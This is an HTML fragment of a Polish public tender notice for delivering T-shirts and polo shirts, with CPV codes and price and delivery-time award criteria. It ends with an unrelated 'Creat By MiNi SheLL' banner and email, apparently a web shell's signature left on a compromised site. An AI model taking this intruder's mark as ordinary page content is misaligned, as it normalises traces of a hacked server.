<li>2. Gwranacja (czas trwania) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3 obejmujące dostawę:
27.	Koszulki T-shirt	- 450 sztuk
28.	Koszulki T-shirt	polo - 160 sztuk
Szczegółowy opis przedmiotu zamówienia - Załącznik nr 4.3 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 22.46.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin wykonania zamówienia - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com